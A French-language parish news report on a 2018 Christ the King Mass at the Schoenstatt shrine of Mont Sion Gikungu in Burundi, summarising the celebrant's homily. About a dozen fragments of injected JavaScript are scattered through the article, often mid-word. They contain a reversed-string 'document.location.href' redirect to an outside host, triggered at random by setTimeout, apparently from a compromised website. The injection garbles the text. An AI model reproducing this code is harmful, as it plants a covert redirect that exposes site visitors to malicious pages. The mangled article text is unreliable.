C’était la joie intense qui se lisait sur les visages des milliers des fidèles qui ont participé à la solennité du Christ Roi de l’univers au Sanctuaire marial de Schoenstatt Mont Sion Gikungu, ce dimanche le 25/11/2018.

P.Herménégilde COYITUNGIYE

A Mont Sion Gikungu , il 9heures. Le soleil tape moins fort. Un à un, les fidèles regagnent l’Eglise de la Sainte Trinité, mais les uns passent dans le Sanctuaire pour faire un bonjour à la Mère Trois fois Admirable. 9heures cinq , on entonne de chants d’animation dans le Prieuré. C ‘est la louange . Comme à l’accoutumée, 9heures et demie, la Messe commence par une procession à partir de la sacristie jusqu’au lieu de la célébration. Accompagné par trois autres toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont l’abbé Félicien NIYOMWUNGERE du Diocèse NGOZI, P. Herménégilde COYITUNGIYE des Pères de Schoenstatt a présidé la célébration de cette solennité.Les chorales St Nicolas de flue;St Martin; Santa Maria; Ste Marie Goreth et Ste Thérèse ont animé la célébration.

«C’est une journée extraordinaire qui nous toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne une grtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande signification de notre vie ». Ce sont les propos du P.Herménégilde en guise d’introduction de cette Eucharistie. « Nous venons louer le Christ Roi, le Roi humble qui s’est livré pour nous afin de nous rendre la joie.» a- t-il ajouté. Etant toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné que c’est le dernier dimanche de l’Année Liturgique, le célébrant a signalé que ça nous rappelle que le Christ est Alpha et Omega. « Nous n’avons pas à nous inquiéter sur ce que nous allons devenir  après la mort .Nous avons Jésus.»

Dans son homélie, il est revenu sur la naissance de la solennité du Christ Roi : « Depuis sa naissance, Jésus était connu comme celui qui renouvellera le règne de David son Père »

Des origines de la fête du Christ Roi       

Selon les propos du Père Herménégilde, c’était en pleine toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doctrine du communisme . L’athéisme régnait dans le monde qutoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and Sa Sainteté le Pape Pie XI a lancé solennellement la célébration de la fête du Christ Roi le 11/12/1925. C’était dans l’objectif de faire que le Christ soit respecté dans tous les pays , que ses commtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andements soient aussi respectés . Dans son encyclique, le Pape Pie XI avait révélé deux choses importantes :

– le monde souffre de divers maux parce qu’on a ignoré Jésus

– pas de paix qutoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and on ne croit pas encore en le seul règne de Jésus

« On s’est éloigné du Christ comme quoi c’est celui qui gêne tel que l’avait fait Hérode en cherchant à l’éliminer »a signalé  le P. Herménégilde. « C’est très difficile d’avoir la paix au monde qutoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and on éloigne Jésus. » a-t–il ajouté . D’après lui, tout le monde n’a pas encore toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné la place au Roi Jésus parce que certains se déguisent pour être de petits dieux comme Hérode. « Mais la parole d’aujourd’hui nous montre Jésus pour ne plus le confondre » a-t-il martelé. « Le Rois que nous sommes venus atoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dorer a ses origines dans les cieux (1ère lecture Daniel 7 ,13-14) . Son règne existera pour toujours contrairement aux règnes d’ici-bas . C’est le Roi qui nous aime et nous libère, contrairement aux Rois de la terre qui ne nous aiment guère (apocalypse 1,5-8). Jésus s’est proclamé Roi pour la 1re fois (évangile : Jean 18,33-37). C’est un Roi humble. Les autres Rois ne vont nulle part sans soldats. Il vient pour nous  étant humble alors que d’autres nous font peur de leur pouvoir . Il est le Roi juste et vrai alors que d’autres sont menteurs et escrocs . Tous les règnes du monde finiront à l’exception de celui de Jésus, son règne combat celui de satan . Il était venu nous protéger contre tous les ténèbres. Je vous demtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande alors: est-ce que ce Roi est venu pour nous seuls ? Certainement pas ! Son règne est de tout le monde blancs et noirs, riches et pauvres, même ceux qui ne croient pas en lui . Heureux ceux qui se prosternent devant lui ». a insisté le P. Coyitungiye. Il a conclu son homélie en rappelant que nous ne pouvons pas franchir ce pas d’approcher Jésus sans une aide de la Vierge Marie : « Nous avons une Maman qui règne avec  son Fils. Qu’elle intercède pour nous !» Pendant l’action de grâce, c’était vraiment la gaité.

Signalons que la messe a été clôturée par une procession vers le Sanctuaire comme on aime le faire chaque dernier dimanche du mois. On a reçu enfin la bénédiction finale.

Brigitte IRAKOZE

                                                                                                                     

 

Laisser un commentaire